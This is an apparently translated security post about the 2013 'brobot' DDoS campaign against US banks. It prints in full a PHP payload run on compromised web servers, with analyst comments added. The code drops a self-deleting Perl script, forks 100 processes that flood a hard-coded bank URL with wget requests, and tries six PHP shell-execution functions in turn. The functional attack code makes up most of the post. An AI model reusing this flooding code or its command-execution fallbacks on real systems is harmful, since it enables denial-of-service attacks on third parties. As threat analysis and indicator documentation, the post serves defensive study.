04.03
Since 2013-04-02 T18:05 UTC, brobot has been launching attacks against US banks again.
The attacker now sends the following code and executes it:
Here is one complete sample (there are several different variants); the line breaks were inserted by us to make it easier to read:
// Builds a short random parameter name: one random lowercase ASCII letter
// (chr of 97..122) followed by the base64 encoding of a random integer in
// 100..10000, with any trailing '=' padding stripped.
// Analyst note: the result is used below as the name of a throwaway query
// parameter appended to the target URL, so the URL differs between runs of
// this script (presumably to get past caches; the page does not say).
function randomvar(){
$a=chr(rand(97,122));
$b=rtrim(base64_encode(rand(100,10000)),'=');
return $a.$b;
}
// Target URL for this sample; it is hard-coded in the delivered code.
$url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
// 32-hex-character value derived from the current time plus a random number.
$rand = md5(microtime().rand(0,500));
// Append exactly one random parameter: name from randomvar(), value = the
// first 4..10 hex characters of $rand. '&' is used when the URL already has a
// query string, '?' otherwise.
// Analyst note: on the victim side this shows up as requests for one fixed
// path carrying a single short random name=hexvalue parameter.
if(preg_match("/\?/",$url))
$url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
else
$url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
// Fallback directory lister, defined only when function_exists('scandir')
// reports that PHP's own scandir() is not available.
// Analyst note: because of this fallback, a host that lacks scandir() still
// supports the directory walk done later in gyhuijoakosdoj().
if(!function_exists('scandir'))
{
// $a: directory path to list.
// $b: when false (the default), entries for which is_dir() is true are skipped.
// $c: when true (the default), "." and ".." are not filtered out by the name test.
// Returns an array of entry names; the array is empty if opendir() fails.
function scandir($a,$b=false,$c=true)
{
$d=array();
if($e=opendir($a))
{
while(false!==($f=readdir($e)))
{
if(($f!="."&&$f!="..")||$c==true)
{
if($b==false)
// is_dir() receives the bare entry name, not "$a/$f", so the test is
// resolved against the process's current working directory.
if(is_dir($f))
continue;
array_push($d,basename($f));
}
}
closedir($e);
}
return $d;
}
}
// Shutdown callback: writes two fixed marker strings to the script output.
// Analyst note: "###Assassin###" and "uau-repeat" end up in the HTTP response
// body of the compromised page, so they can serve as content signatures for
// this variant. What the sender does with them is not shown on the page.
function on_exit()
{
echo "###Assassin###\n";
echo "\nuau-repeat";
}
// Register on_exit() so the marker strings are printed when the script ends,
// but only if register_shutdown_function is available.
if(function_exists('register_shutdown_function'))
register_shutdown_function("on_exit");
// Drop a Perl script into a writable directory chosen by tgya8siudj(); the
// file name is the md5 of the current microtime, i.e. 32 hex characters with
// no extension. The fopen() handle is not kept or closed explicitly.
//
// What the embedded Perl text does, read from the listing:
//   - unlinks its own file ($h) first, so the script does not stay on disk
//     while it runs;
//   - loops 100 times calling fork(); the parent branch is empty, the child
//     branch runs the request loop and then leaves the for loop with `last`;
//   - each child repeats for 120 seconds: a backgrounded `wget` against $url
//     with a fixed User-Agent, -t 45, --delete-after and
//     --no-check-certificate, pausing one second after every 100 launches.
//
// NOTE(review): as printed on the page the escaping inside this double-quoted
// string looks incomplete (see the stray `\"` closing the system(...) line),
// so this listing is a readable rendering rather than the exact bytes that ran.
//
// Analyst note, host-side indicators visible in this block: a web-server user
// writing <dir>/<32 hex chars>, then running `perl` on it, followed by many
// short-lived wget processes using --delete-after and the hard-coded
// User-Agent below. The User-Agent is constant in this sample, so it can also
// be matched on the receiving side.
fwrite(fopen($h=tgya8siudj().'/'.md5(microtime()),'w'),
"unlink '$h';
$time=time();
for($i = 0;$i < 100;$i++)
{
if(fork())
{
}
else
{
$j=0;while(time()-$time<120)
{
$j++;
if($j % 100 == 0)
{
sleep 1;
}
system("wget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8' -t 45 --delete-after --no-check-certificate '$url' 2>&1 &\");
}
last;
}
}"
); # fwrite Ends
// Run the dropped file with the perl interpreter through iyiuo(), which picks
// whichever command-execution function is available. The return value is ignored.
iyiuo("perl $h");
// Same two markers that on_exit() prints; with the shutdown callback
// registered they are emitted here and again when the script terminates.
echo "###Assassin###";
echo "\nuau-repeat";
// Runs the shell command $r with the first available of six PHP execution
// functions and returns the captured output as a string ("" when $r is empty
// or none of the branches applies). Most calls are prefixed with '@' to
// suppress PHP error output.
// Analyst note: the order tried is exec, shell_exec, system, passthru, popen,
// proc_open. Restricting only some of these leaves the rest usable, so a
// php.ini disable_functions policy has to cover all six to block this path.
function iyiuo($r)
{
$s="";
if(!empty($r))
{
if(function_exists('exec'))
{
// exec() fills $s with an array of output lines; join them back into one string.
@exec($r,$s);
$s=join("\n",$s);
}
elseif(function_exists('shell_exec'))
$s=@shell_exec($r);
elseif(function_exists('system'))
{
// system() prints the output directly, so it is captured with output buffering.
@ob_start();
@system($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
// Same buffering approach as the system() branch.
@ob_start();
@passthru($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('popen') and @is_resource($t=@popen($r,"r")))
{
// Read the command's output from the pipe in 1024-byte chunks until EOF.
$s="";
while(!@feof($t))
$s.=@fread($t,1024);
@pclose($t);
}
elseif(function_exists('proc_open'))
{
// Three pipes are requested: index 0 read by the child, 1 and 2 written by it.
// Only pipe 1 is read; pipe 2 is closed without being read.
$u=proc_open($r,array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$v);
$s=stream_get_contents($v[1]);
fclose($v[0]);
fclose($v[1]);
fclose($v[2]);
proc_close($u);
}
}
return $s;
}
// Searches the directory tree under the web document root and returns the
// path of the first subdirectory that is_writable() accepts, or false when
// none is found. The document root itself is never tested, only directories
// below it.
// Analyst note: this is why writable directories under the web root matter
// for this sample; one of them becomes the drop location when /tmp and the
// other candidates in tgya8siudj() are not usable.
function gyhuijoakosdoj()
{
$j="";
// If DOCUMENT_ROOT is missing, derive it by cutting SCRIPT_NAME's length off
// the end of SCRIPT_FILENAME.
if(!isset($_SERVER["DOCUMENT_ROOT"]))
$_SERVER["DOCUMENT_ROOT"]=substr($_SERVER["SCRIPT_FILENAME"],0,-strlen($_SERVER["SCRIPT_NAME"]));
// $k is the work list of directories still to visit; array_pop() takes the
// most recently added one first.
$k[]=$_SERVER["DOCUMENT_ROOT"];
while($k)
{
$l=array_pop($k);
if($m=scandir($l))
{
$n=0;
while(isset($m[$n]))
{
if($m[$n]!=="."&&$m[$n]!=="..")
{
$o="{$l}/{$m[$n]}";
if(is_dir($o))
{
// Queue the subdirectory for a later visit, then return at once if it is writable.
$k[]=$o;
if(@is_writable($o))
{
return $o;
}
}
}
$n++;
}
}
}
return false;
}
// Picks the directory the Perl script is written to. Candidates, in the
// order tested: '/tmp', the directory of the running PHP script, the TMP /
// TMPDIR / TEMP environment variables, a writable directory under the web
// root (gyhuijoakosdoj()), and finally the directory tempnam() falls back to.
// Returns a path string, or false when tempnam() fails as well.
// Analyst note: these are the locations to watch or review for
// 32-hex-character file names created by the web-server user.
function tgya8siudj()
{
if(@is_writable('/tmp'))
return '/tmp';
// The regex strips the trailing file name from SCRIPT_FILENAME, leaving its directory.
elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
// NOTE(review): the name tested here is "sys_gt_temp_dir", while the else
// branch at the bottom calls sys_get_temp_dir(). Unless a function with the
// tested spelling exists, this branch is the one taken.
elseif(!function_exists("sys_gt_temp_dir"))
{
if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
return realpath($_ENV["TMP"]);
elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
return realpath($_ENV["TMPDIR"]);
elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
return realpath($_ENV["TEMP"]);
else
{
$a=gyhuijoakosdoj();
// `==!false` compares against true, i.e. any non-empty path string passes.
if($a==!false)
return $a;
// tempnam() is given a random md5 string as the directory; the temp file it
// creates is used only to learn its directory and is deleted again at once.
$p=tempnam(md5(uniqid(rand(),TRUE)),"");
if($p)
{
$q=realpath(dirname($p));
@unlink($p);
return $q;
}
else
return false;
}
}
else
return sys_get_temp_dir();
}
// End the PHP script here; the shutdown callback registered earlier (on_exit)
// runs at this point if registration succeeded.
exit;
Complete code, formatted
The code now brings its own „scandir“ function, used when the built-in function does not exist or is disabled.
It now also tries to run the DDoS by calling wget through exec, proc_open and other functions, and no longer through fsockopen or stream….
Are there too many systems without socket support?
Update: Here is a code sample that uses sockets
The hackers have written a new phase for „Phase3/W5 Operation Ababil“